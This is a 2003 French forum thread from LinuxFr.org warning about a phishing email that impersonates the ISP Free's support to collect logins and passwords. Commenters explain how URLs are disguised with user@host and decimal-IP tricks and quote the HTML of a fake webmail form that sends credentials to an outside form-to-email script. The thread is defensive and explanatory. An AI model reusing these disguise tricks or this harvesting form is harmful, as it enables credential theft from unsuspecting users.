dimanche 05 octobre
Accueil :: Dépêches :: Entretiens :: Journaux :: Forums :: Sondages :: Suivi :: Statistiques :: Contact :: Plan

Derniers journaux de Dsls :

Journal : [Free] Usurpation d'identité et escroquerie

Posté par Dsls (page perso, ) le 28 octobre 2003
0
Un petit plaisantin se faisant passer pour supportfree@free.fr arrose quelques boites e-mail de free avec un message du genre :

Bonjour,

Suite à un changement d'ordre matériel, nous vous invitons à confirmer une nouvelle fois votre compte afin de réadapter notre réseau à vos besoins. Si vous possèdez plusieurs comptes, nous vous demandons de bien vouloir les actualiser tous, sauf si vous souhaitez en résilier.
Nous vous demandons de répondre le plus rapidement possible à ce message sous peine de suppression de votre espace web.
Veuillez suivre la démarche ci-dessous :

Lisez le formulaire
Remplissez les champs d'informations suivants
Cliquez sur "envoyer"

S'ensuit un beau formulaire avec login/password

Evidemment ça pue l'arnaque à plein nez, et c'en est une... le gars a même poussé le vice jusqu'à se créer une page perso chez free avec un beau script php pour récupérer tout ce que les gens vont renseigner ...

> Lire le journal (22 commentaires, moyenne: 1,8).  

Cette discussion est archivée, il n'est plus possible de laisser des commentaires.

Note : les commentaires appartiennent à ceux qui les ont postés. Nous n'en sommes pas responsables.

Re: [Free] Usurpation d'identité et escroquerie

Posté par Pascal Terjan (Jabber id, page perso, ) le 28/10/2003 à 11:32. (lien). Évalué à 2.

forwarde ca à abuse@free.fr

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par Dsls (page perso, ) le 28/10/2003 à 11:35. (lien). Évalué à 4.

    déjà fait ;)

    • [^]Re: [Free] Usurpation d'identité et escroquerie

      Posté par Dsls (page perso, ) le 28/10/2003 à 11:50. (lien). Évalué à 3.

      Ils viennent de me répondre, et m'invitent à porter plainte auprès des autorités... [:lapincompris]

      • [^]Re: [Free] Usurpation d'identité et escroquerie

        Posté par Pascal Terjan (Jabber id, page perso, ) le 28/10/2003 à 12:18. (lien). Évalué à 3.

        C'est toi la cible de l'escoquerie, je pense qu'ils ne peuvent pas porter plainte eux même et ont besoin que les victimes le fassent.

        • [^]Re: [Free] Usurpation d'identité et escroquerie

          Posté par Dsls (page perso, ) le 28/10/2003 à 12:22. (lien). Évalué à 1.

          euh ... oui et non ... moi je m'en fiche un peu, si je leur ai envoyé le mail, c'est surtout pour que d'autres ne se fassent pas avoir (non, je n'ai pas rempli le formulaire). Le minimum serait peut-être de fermer le site qui est lui-même hébergé chez free, voire d'avertir les autres utilisateurs de free de cette arnaque.

          • [^]Re: [Free] Usurpation d'identité et escroquerie

            Posté par Pierre Tramo (page perso, ) le 28/10/2003 à 19:05. (lien). Évalué à 2.

            De toute façon, si ils ferment, le monsieur va rouvrir aussi sec un compte sur free ou sur n'importe quel autre hébergeur gratuit et sans scrupules (je serais lui, j'ouvrirais quelque chose sur voila, par exemple). Le seul problème serait de maquiller suffisamment l'url pour qu'elle ne saute pas trop aux yeux.

            Porter plainte, par contre, ça permet d'enclencher un processus permettant de tracer et perquisitionner chez le petit malin. Donc, on peut espérer qu'il arrête de nuire, on doit pouvoir également en perquisitionnant se donner une idée des dégâts occasionnés, etc.

            --
            C'est ce que je pensais, vous êtes un petit con monsieur. Une merde de plus dans une immensité de caca virtuel. Vous êtes la honte du net francophone vous et vos copains. (Phill)

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par Julien CARTIGNY (page perso, ) le 28/10/2003 à 11:36. (lien). Évalué à 3.

    Il y a eu la même arnaque récemment, mais avec paypal. Genre nous devons mettre à jour des informations, veuillez aller sur cette page. Cette dernière, hebergé par un serveur type free en corée ouvrait un script avec tout le blabla paypal et demandait le login /password.

    En général, il y a un moyen simple pour détecter le problème, c'est l'adresse donnée qui est du type:

    http://free.fr@mon_serveur_pirate/(...)

    free.fr n'étant pas l'adresse mais juste le login de connexion sur la page racine de mon_serveur_pirate

    --
    "Nobody expects the spanish inquisition"

    • [^]Re: [Free] Usurpation d'identité et escroquerie

      Posté par Nap () le 28/10/2003 à 12:18. (lien). Évalué à 3.

      quand ils sont plus malins ils mettent pas le nom dns mais l'ip en notation décimale

      http://free.fr@3558547933/(...) ça le fait bien :)

      • [^]Re: [Free] Usurpation d'identité et escroquerie

        Posté par Annah C. Hue (page perso, ) le 28/10/2003 à 12:26. (lien). Évalué à 3.

        Mon squid il aime po : "Unable to determine IP address from host name for 3558547933".

        Tant mieux.

        • [^]Re: [Free] Usurpation d'identité et escroquerie

          Posté par Nap () le 28/10/2003 à 12:32. (lien). Évalué à 2.

          tiens c'est marrant il gère pas les adresses décimales squid ?

          • [^]Re: [Free] Usurpation d'identité et escroquerie

            Posté par Boa Treize (page perso, ) le 28/10/2003 à 12:47. (lien). Évalué à 1.

            Moi j'ai jamais réussi à les faire marcher les adresses décimales. Enfin, vu l'utilité, ça m'a jamais gêné... :-)

            • [^]Re: [Free] Usurpation d'identité et escroquerie

              Posté par Nap () le 28/10/2003 à 14:00. (lien). Évalué à 1.

              bah sur le lien du dessus, avec mozilla, yakakliké (si tu passes pas par squid :) )

              sinon c'est vrai que je me suis toujours demandé à quoi ça servait :)

      • [^]Re: [Free] Usurpation d'identité et escroquerie

        Posté par JMVF () le 28/10/2003 à 14:36. (lien). Évalué à 0.

        tient on en apprend tous les jours, jamais vu ça encore ! donc si j'ai bien compris je prend l'adresse comme un nombre binaire 32bit et je convertis en décimal ?

      • [^]Re: [Free] Usurpation d'identité et escroquerie

        Posté par LLG () le 28/10/2003 à 18:23. (lien). Évalué à 1.

        Une explication à ça:
        http://3639551844/(...) correcte
        http://3625396068/(...) quork!

        Un ping sur les deux donne la même adresse IP, mais le quork ne passe pas!

        Le quork a été fabriqué avec cette erreur:
        (((216*255)+239)*256+39)*256+100
        3625396068
        (((216*256)+239)*256+39)*256+100
        3639551844

Re: [Free] Usurpation d'identité et escroquerie

Posté par Pierre Tramonson () le 28/10/2003 à 14:10. (lien). Évalué à 1.

C'est le moment où jamais pour vérifier si son formulaire est vraiment bien sécurisé et qu'il échappe bien les caractères étranges :)

Re: [Free] Usurpation d'identité et escroquerie

Posté par j (page perso, ) le 28/10/2003 à 15:17. (lien). Évalué à 2.

dans le meme genre : une fausse interface du webmail de free.fr

http://iiimp.free.fr(...)

extrait du code source d'un des cadres :

form name="Ident" action="http://www.alibaweb.net/cgi-bin/services/form2email.pl(...)" method="post"
p>
<input type="hidden" value="neo.anderson4@laposte.net" name="recipient"

<input type="hidden" value="http://imp.free.fr/login.php3(...)" name="redirect"
<input type="hidden" value="Un_Nouveau_MdP_Free!!!" name="subject"
<input type="hidden" value="Le_Gentil_Site_Ki_Donne_Les_MdP_Free!!!" name="from"
<input type="hidden" value="Le_Gentil_Site_Ki_Donne_Les_MdP_Free!!!" name="email"
<input type="hidden" value="REMOTE_HOST,REMOTE_ADDR,REMOTE_IDENT,R

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par j (page perso, ) le 28/10/2003 à 15:29. (lien). Évalué à 1.

    (je complete)

    ce problème a été signalé par ACBM il y a plus d'un mois déja :

    http://www.acbm.com/inedits/actua.html(...) (voir leur dépêche du 16 septembre)

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par furai (page perso, ) le 28/10/2003 à 16:35. (lien). Évalué à 1.

    ils imitent encore l'ancienne interface, et ca s'est vu au changement de imp
    -> les pages sont suffixees en .php et plus en php3.

    Il y a la meme sur http://iimp.free.fr(...)

    D'ailleurs, c'est normale qu'il traine des scripts qui permettent d'envoyer des mails comme ca ?
    (dans ce cas http://www.alibaweb.net/cgi-bin/services/form2email-fake.pl,(...) mais j'en ai deja vu d'autre)

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par gnap gnap (page perso, ) le 28/10/2003 à 16:37. (lien). Évalué à 1.

    Et un script remplirait ce formulaire toutes les 10 secondes, ça donnerait quoi ?
    Après tout, il n'ya rien de répréhensible à vouloir toutes les 10 secondes utiliser imp, il n'est précisé nulle part que cela envoie un courriel quelque part, et une requete toutes les 10 secondes ne risque pas de charger un serveur...

  • [^]Re: [Free] Usurpation d'identité et escroquerie

    Posté par Pierre Tramonson () le 28/10/2003 à 16:39. (lien). Évalué à 2.

    Ah le pauvre il a mis son email en clair dans la page...

    • [^]Re: [Free] Usurpation d'identité et escroquerie

      Posté par GCN (Jabber id, page perso, ) le 29/10/2003 à 16:21. (lien). Évalué à 1.

      36-15 boolay

      --
      The UNIX way of sex:
      date;cd ~;gunzip;strip;touch;finger;mount;fsck;more;yes;umount;sleep

      • [^]Re: [Free] Usurpation d'identité et escroquerie

        Posté par Annah C. Hue (page perso, ) le 30/10/2003 à 08:03. (lien). Évalué à 2.

        Peut-être qu'il a mis l'email d'un mec qu'il aime pas...

Revenir en haut de page

Run by Team LinuxFr.org

Cette page a été générée par Templeet en 0.1001s (dont 0.009 de SQL).
Cette page est peut-être conforme xhtml 1.0.
Information sur le site.
Faire un don !